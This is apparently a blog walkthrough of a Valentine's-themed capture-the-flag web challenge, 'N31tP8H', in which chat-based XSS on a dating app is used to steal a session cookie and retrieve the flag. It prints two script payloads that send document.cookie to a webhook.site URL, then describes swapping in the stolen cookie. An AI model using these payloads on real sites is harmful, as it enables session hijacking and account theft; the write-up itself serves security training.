Walkthrough – N31tP8H

Summary

This Valentine’s-themed web challenge focuses on exploiting Cross-Site Scripting (XSS) to steal a cookie, hijack an account, and retrieve the flag.

Write-up

This image has an empty alt attribute; its file name is image.png

The login page appears resistant to basic SQL injection and authentication bypass attempts.

We will move on with the Sign Up function.

This image has an empty alt attribute; its file name is image-1.png

The signup process, however, requires a profile picture upload, which presents a potential vulnerability.

Moving on the the Dashboard.

This image has an empty alt attribute; its file name is image-2.png

Upon reaching the dashboard, swiping through profiles reveals usernames, not nicknames, as indicated in dashboard.js. This suggests two possible attack vectors: XSS within the chat functionality or exploiting a web Large Language Model (LLM) integrated into the chatbot.

This image has an empty alt attribute; its file name is image-3-1024x538.png

This image has an empty alt attribute; its file name is image-4.png

I initially pursued the web LLM angle, influenced by my experience with tools like ChatGPT and Gemini. However, this proved to be a misdirection. The challenge actually involves a simpler XSS vulnerability.

Let try some basic XXS with:

This image has an empty alt attribute; its file name is image-5-1024x536.png

We’ve confirmed the XSS vulnerability. Now, let’s craft a payload to steal cookies.

<script>fetch('https://webhook.site/b7e66...',{method: 'POST', mode: 'no-cors', body:document.cookie}); </script>

<script>document.location="https://webhook.site/b7e66.../?cookie="+document.cookie</script>

This image has an empty alt attribute; its file name is image-6.png

Replace the cookie we got and refresh the page to get the flag.

This image has an empty alt attribute; its file name is image-7.png

Tag: Walkthrough

Titanic

OnlyHacks

Summary

Write-up